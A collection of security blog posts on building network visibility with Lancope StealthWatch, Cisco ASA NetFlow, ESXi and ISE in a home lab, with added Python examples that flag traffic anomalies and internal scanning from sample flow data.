The Lancope Collector lists an 8 GB memory requirement with 2 CPUs; however, ESXi 5.1 gave a resource error message upon launching. I reduced the memory to 4 GB per CPU, which fixed that issue. Once the Lancope Collector is up, access its GUI via HTTPS. You must point it at the SMC under the Configuration tab.

I enabled NetFlow on an ASA 5505 firewall (running 8.2(2) or greater) and pointed it at the Lancope Collector for network visibility. My ASA 5505 is also powering my 1121 Access Point for wireless. To enable NetFlow in ASDM, click Configuration under Device Management, click NetFlow under Logging, change the template timeout to 1 minute and the delay to 15 seconds, and check “Disable Redundant Syslog”. Select Inside, enter the collector’s IP and the UDP port 2055.

[Screenshot: Creating the NetFlow collector in the ASA]

Next, create a firewall policy under Firewall and Service Policy Rules. Click Global, give it a name, select All Traffic, click the NetFlow tab and select the collector IP you built under Device Management. NOTE: If you update the collector under Device Management, you must first delete its reference in the firewall policy to avoid errors.

[Screenshot: Adding the firewall policy in the ASA]

To add visibility into my ESXi environment, I have loaded a Lancope virtual Sensor. The Lancope Sensor requires 1 GB of memory and 1 CPU. Once the Sensor is up, you must point it at the Lancope Collector and add the ESXi server. Prior to doing that, you must create a read-only user account in ESXi. NOTE: ESXi has discontinued groups. Click Local Users & Groups and create a new user by right-clicking and choosing Add. Give the user a name and password. Next, click Permissions, right-click your new user and choose Edit. Add a permission of Read-Only. Once the account is ready, log in to the HTTPS interface of the Lancope Sensor. Click the Configuration tab and add the Lancope Collector. Next, go under Configuration and add your ESXi server. If the steps are performed correctly, the SMC should automatically detect the new Lancope Sensor and the virtual environment.

[Screenshot: Adding VMware to the Lancope SMC]

I have ISE 1.2 providing admission control for my LAN and wireless networks. ISE data can be imported into the Lancope SMC. This is done from the GUI by right-clicking Identity Services in the Lancope SMC tree and clicking Add. Fill out the ISE information using the admin login for ISE.

At this point, the Lancope SMC has NetFlow from an ASA firewall that sees LAN and wireless traffic, ISE authentication data and NetFlow from inside a virtualized environment. I plan to add the SLIC feed for reputation once I obtain a license. I now have full visibility of my home network.

[Screenshot: Lancope SMC device tree]

Filed under Security Management & Analysis

Situational Awareness For Cyber Threat Defense

Aamir Lakhani did a great post on Situational Awareness. The original post can be found HERE.

[Illustration by Kekai Kotaki]

Problem

Cisco Systems, in its Cyber Security Threat Defense white papers, outlines how the network security threat landscape is evolving. It describes how modern attacks are stealthy and evade traditional perimeter security defenses.

Traditional monitoring and reporting tools are no longer sufficient for detecting true threats on the network. Modern security tools and hardware devices such as firewalls, anti-virus, patch management solutions, IPS and other solutions can only provide a small amount of relief against attacks. Most of these tools seem to be implemented mainly to fulfill some sort of checkmark for an auditor on a compliance form. Security professionals know that these tools, although very important, do not by themselves provide a full security defense architecture.

Furthermore, as security threats and malware invade systems, security administrators are having trouble understanding the nature of attacks, how they occur and how to defend against them. Remember, you can’t fight what you don’t understand.

“It is said that if you know your enemies and know yourself, you will not be imperiled in a hundred battles; if you do not know your enemies but do know yourself, you will win one and lose one; if you do not know your enemies nor yourself, you will be imperiled in every single battle.”

- Sun Tzu, The Art of War (source: http://en.wikiquote.org/wiki/Sun_Tzu)

[Image: Cisco Identity Services Engine. Image source: Cisco]

Cisco Identity Services Engine provides true network identification, profiling and access control.

As the centerpiece of Cisco’s TrustSec solution, Cisco ISE creates a secure ecosystem that treats security as a holistic solution.

Federal Cyber Initiatives

New mandates are putting cyber security front and center in the news. President Obama recently challenged the nation and the Federal government of the United States to increase their cyber defense capabilities. Federal IT budgets are being cut in 2013; however, spending on cyber security appears to be increasing in the eyes of the casual onlooker.

Cisco Systems, in its Cyber Threat Defense White Paper, discusses how “with increasingly sophisticated cyber attacks like WikiLeaks on the rise, federal agencies require more innovative solutions for maintaining a strong security posture. Additionally, with the evolution of the CNCI (Comprehensive National Cybersecurity Initiative), federal agencies are being required to take a more holistic and collaborative approach to analyzing threat information across the totality of government networks for improved incident response and forensic investigation.”

Being constantly bombarded with continuous threats, how can security professionals even gauge whether they are being attacked or whether a threat poses a clear and present danger (yes, that was a Harrison Ford shout-out)?

[Image: RSA NetWitness logo. Image source: RSA]

How To Solve The Problem

I recommend creating a conceptual framework for a Threat Defense Visibility and Awareness program. The goals of the program should be to (1) provide a framework that can be built using products, technologies and methodologies available today, (2) provide real-time visibility into network health and status, (3) provide real-time network posture and attack risk baselines, and (4) provide a training facility for attack analysis and defense.

What Is Network Visibility?

According to Lancope (source: http://www.lancope.com/), “network visibility focuses on the most complex and dangerous information security threats – threats that lurk in networks for months or years at a time stealing vital information and disrupting operations. This type of solution provides visibility into these threats and context to decipher their targets and potential damage”. Lancope further states on its website that security analysts gain visibility into advanced cyber threats such as:

  • Network reconnaissance
  • Network interior malware proliferation
  • Command and control traffic
  • Data exfiltration

[Image: Lancope StealthWatch provides network visibility: understanding trends, anomalies and threats on the network. Image source: Lancope]

Network visibility gives security administrators the ability to detect problems because it highlights changes from baseline behavior. Did traffic spike 100%? Did outbound traffic suddenly increase? Are more requests being sent to a new domain on the Internet? All of these occurrences can indicate an attack. Network visibility shows network security professionals exactly what is different about today’s traffic patterns compared with what the traffic normally looks like.
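The three questions in the paragraph above (a total traffic spike, an outbound increase, contact with a domain never seen before) are each a comparison of the latest observation against a baseline. The following added example, which is not Lancope’s code or part of the original post, shows the logic over constructed per-host daily flow roll-ups of the kind a collector would export; the hosts, byte counts, domain names and the 2x spike threshold are all assumptions made for the demonstration.

```python
"""Baseline-deviation checks over constructed per-host flow summaries.

Added example (not StealthWatch code). Each record is a daily roll-up of
what a flow collector would export for one internal host; the baseline is
the mean of all previous days for that host.
"""
from statistics import mean
from typing import Dict, FrozenSet, List, NamedTuple


class DailyHostSummary(NamedTuple):
    host: str
    day: int
    bytes_out: int                 # bytes sent toward the Internet
    bytes_total: int               # all bytes in and out
    dst_domains: FrozenSet[str]    # external domains contacted


# Constructed sample: host .21 has three quiet days and then a day that
# looks like exfiltration; host .22 stays within its normal range.
SAMPLE: List[DailyHostSummary] = [
    DailyHostSummary("10.0.10.21", 1, 40_000_000, 400_000_000, frozenset({"example.com", "updates.example"})),
    DailyHostSummary("10.0.10.21", 2, 45_000_000, 410_000_000, frozenset({"example.com", "updates.example"})),
    DailyHostSummary("10.0.10.21", 3, 38_000_000, 390_000_000, frozenset({"example.com"})),
    DailyHostSummary("10.0.10.21", 4, 600_000_000, 820_000_000, frozenset({"example.com", "dropzone.invalid"})),
    DailyHostSummary("10.0.10.22", 1, 10_000_000, 100_000_000, frozenset({"example.com"})),
    DailyHostSummary("10.0.10.22", 2, 11_000_000, 105_000_000, frozenset({"example.com"})),
    DailyHostSummary("10.0.10.22", 3, 9_000_000, 98_000_000, frozenset({"example.com"})),
    DailyHostSummary("10.0.10.22", 4, 12_000_000, 110_000_000, frozenset({"example.com"})),
]


def find_anomalies(records: List[DailyHostSummary], spike_ratio: float = 2.0) -> Dict[str, List[str]]:
    """Return {host: [reasons]} for hosts whose latest day deviates from baseline.

    A host with only one day of data is skipped: there is no baseline yet.
    """
    by_host: Dict[str, List[DailyHostSummary]] = {}
    for r in records:
        by_host.setdefault(r.host, []).append(r)

    findings: Dict[str, List[str]] = {}
    for host, rows in by_host.items():
        rows.sort(key=lambda r: r.day)
        if len(rows) < 2:
            continue
        *history, latest = rows
        base_total = mean(r.bytes_total for r in history)
        base_out = mean(r.bytes_out for r in history)
        seen_domains = frozenset().union(*(r.dst_domains for r in history))

        reasons: List[str] = []
        if latest.bytes_total >= spike_ratio * base_total:
            reasons.append(f"total traffic {latest.bytes_total / base_total:.1f}x baseline")
        if latest.bytes_out >= spike_ratio * base_out:
            reasons.append(f"outbound traffic {latest.bytes_out / base_out:.1f}x baseline")
        new_domains = sorted(latest.dst_domains - seen_domains)
        if new_domains:
            reasons.append("new external domains: " + ", ".join(new_domains))
        if reasons:
            findings[host] = reasons
    return findings


if __name__ == "__main__":
    for host, reasons in find_anomalies(SAMPLE).items():
        print(host, "->", "; ".join(reasons))
```

The mean-of-history baseline is deliberately simple; a production system would use a longer window, per-hour rather than per-day buckets, and a deviation measure that tolerates weekday and weekend differences, but the shape of the check (observe, compare with what is normal for this host, report what changed) is the same.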

Filed under Security Management & Analysis

Cisco’s Cyber Solutions – What Is Happening In Your Network

Today’s threat landscape is loaded with malicious websites, malware and other risks that attack users every nanosecond of the day. There isn’t a single product available that can guarantee protection from cyber threats. Older solutions that rely on static technologies such as signatures are not good enough. The best approach for dealing with advanced threats is continuously monitoring the entire network through layered security technologies.

Cisco is known for network and collaboration products, but Cisco also has a very strong security catalog that extends beyond traditional firewalls and IPS appliances. If I had to summarize Cisco’s core visibility technologies for cyber threats, I would highlight Cisco’s capabilities around Access Control, Web Security and its partnership with Lancope for Insider Threats.

Access Control is critical for knowing who and what is accessing your network, regardless of whether it is over the LAN, wireless or remotely via VPN technology. Cisco Identity Services Engine (ISE) provides visibility of users accessing the network by leveraging how people authenticate, along with profiling the types of devices being used. The screenshot below shows two users with mobile devices obtaining different levels of wireless access. Cisco ISE can also verify that devices meet specified policies by enforcing posture prior to granting network access, for example ensuring that Joey’s Windows 7 laptop has the latest updates and security applications installed.

[Screenshot: Cisco ISE showing Android with Contractor access and iPhone with Employee mobile access]

[Screenshot: Profiled devices in my home lab. “Apple-Device” is a Mac mini hosting ISE via “VMWare-Device”]

[Screenshot: Some default profiles for Cisco ISE]

Web Security is crucial for protecting internal users from threats while surfing the public Internet. Cisco Web Security Appliance (WSA, previously IronPort) provides visibility of Internet usage as well as security through layered technologies. Network use policies, such as denying gambling web content during work hours, can easily be enforced through Cisco WSA’s categorized content classes.

[Screenshot: Cisco WSA content dashboard]

The real value of Cisco WSA is going beyond average web content filtering by offering layers of security options that protect users accessing approved content. The first layer verifies whether the web source is a known evil location based on reputation. Reputation can be built from factors such as where the source is located, how long it has been up and whether it has been marked as a source of malicious activity. If the web source has a safe reputation, WSA scans the traffic with a combination of Sophos, McAfee and Webroot engines, along with other intelligence, looking for malicious behavior. There is also a botnet scanner that sits on a SPAN port, designed to catch users whose devices have been compromised and are generating malware phone-home activity. The botnet scanner is a first step toward identifying insider threats, but it is not good enough on its own.

[Screenshot: Cisco WSA main dashboard]

[Screenshot: Cisco WSA threat dashboard]

True insider threat visibility can only be accomplished by monitoring all internal traffic for threats that can compromise your network through email, web, infected devices or other means. Cisco has partnered with Lancope to give network-wide forensic visibility, leveraging capabilities that already exist within networking products such as routers, switches and firewalls, as well as in the data center. Administrators can use Lancope’s StealthWatch to see the top 10 threats, ranging from data loss to botnet infections.

[Screenshot: Main Lancope cyber security dashboard (top 4 machines infected with botnets)]

[Screenshot: Ethel’s Windows 7 workstation with botnet]

[Screenshot: Ethel’s workstation communicating with a malicious source]

Lancope identifies threats using a combination of reputation and behavior, regardless of whether the threat attempts to hide by throttling, by encryption or by interacting through multiple compromised systems. Some examples are flagging a user dumping large amounts of data to Dropbox, communication with known malware web sources, host-to-host reconnaissance and use of obscure ports. Lancope can zero in on a threat by stitching together the entire communication chain, meaning an administrator will see a map of all infected devices, how the infection started, who the users are (including Cisco ISE integration), where it is spreading and how it is sending traffic off the network. Lancope also gives visibility into abuse of network resources, unauthorized tunneling and network performance problems.

[Screenshot: Lancope data loss diagram]

[Screenshot: Malware propagation diagram. The purple IP has infected the green IP, which is probing other systems]

[Screenshot: Known botnet sources via reputation]
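The host-to-host reconnaissance flag and the stitched chain described above (an external address with bad reputation reaches an inside host, which then starts probing its neighbours, exactly the purple-to-green picture in the propagation diagram) can both be derived from plain flow records. The following is an added example written for this page, not Lancope’s code: the flow records, the reputation list, the 10.0.0.0/8 “internal” definition and the fan-out thresholds are all constructed assumptions.

```python
"""Reconnaissance detection and infection-chain stitching over flow records.

Added example (not StealthWatch code). The capture, the reputation feed and
the internal address range are constructed for the demonstration.
"""
from collections import defaultdict
from ipaddress import ip_address, ip_network
from typing import Dict, List, NamedTuple, Set, Tuple

INTERNAL = ip_network("10.0.0.0/8")          # assumed internal range
BAD_REPUTATION: Set[str] = {"203.0.113.77"}  # constructed reputation feed


class Flow(NamedTuple):
    ts: int        # seconds since start of capture
    src: str
    dst: str
    dport: int
    bytes: int


# Constructed capture: 203.0.113.77 reaches 10.0.20.5 (purple -> green), then
# 10.0.20.5 sweeps its /24 on port 445 and walks many ports on one peer.
# 10.0.20.9 only talks to one external web server and should not be flagged.
FLOWS: List[Flow] = (
    [Flow(10, "203.0.113.77", "10.0.20.5", 443, 120_000)]
    + [Flow(60 + i, "10.0.20.5", f"10.0.20.{100 + i}", 445, 200) for i in range(25)]
    + [Flow(100 + i, "10.0.20.5", "10.0.20.130", p, 80)
       for i, p in enumerate((22, 23, 80, 135, 139, 3389, 5900, 8080, 8443, 9200, 10000, 49152))]
    + [Flow(30 + i, "10.0.20.9", "198.51.100.10", 443, 50_000) for i in range(20)]
)


def is_internal(addr: str) -> bool:
    return ip_address(addr) in INTERNAL


def find_scanners(flows: List[Flow], host_threshold: int = 20, port_threshold: int = 10) -> Set[str]:
    """Internal hosts that fanned out to many internal peers, or to many ports on one peer."""
    peers: Dict[str, Set[str]] = defaultdict(set)
    ports: Dict[Tuple[str, str], Set[int]] = defaultdict(set)
    for f in flows:
        if is_internal(f.src) and is_internal(f.dst):
            peers[f.src].add(f.dst)
            ports[(f.src, f.dst)].add(f.dport)
    scanners = {src for src, p in peers.items() if len(p) >= host_threshold}
    scanners |= {src for (src, _), p in ports.items() if len(p) >= port_threshold}
    return scanners


def stitch_chain(flows: List[Flow], scanner: str) -> dict:
    """Describe the chain around one scanning host: where it was reached from,
    when it started probing, and which internal hosts it touched."""
    first_probe = min(f.ts for f in flows if f.src == scanner and is_internal(f.dst))
    # Bad-reputation addresses that reached the scanner before it started probing.
    sources = sorted({f.src for f in flows
                      if f.dst == scanner and f.ts < first_probe and f.src in BAD_REPUTATION})
    victims = sorted({f.dst for f in flows if f.src == scanner and is_internal(f.dst)})
    return {"host": scanner, "infected_from": sources,
            "probe_started": first_probe, "probed": victims}


if __name__ == "__main__":
    for host in sorted(find_scanners(FLOWS)):
        print(stitch_chain(FLOWS, host))
```

The thresholds are the tuning knob: too low and a vulnerability scanner or a backup server becomes a “scanner”, too high and a slow sweep is missed, which is why a real deployment pairs fan-out counts with the reputation and baseline signals the post describes rather than relying on any one of them.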

Combining Access Control, Web Security and Insider Threat technology gives administrators complete visibility of what is happening on the network. There is a lot of power in having reports that show every user and device on the network, how those devices access the public Internet, and near real-time analytics on whether any of those devices have been compromised. This information can dramatically improve the identification of and reaction to cyber threats, saving time, money and other problems caused by network breaches.

Filed under Internet Defense, Network Admission Control, Security Management & Analysis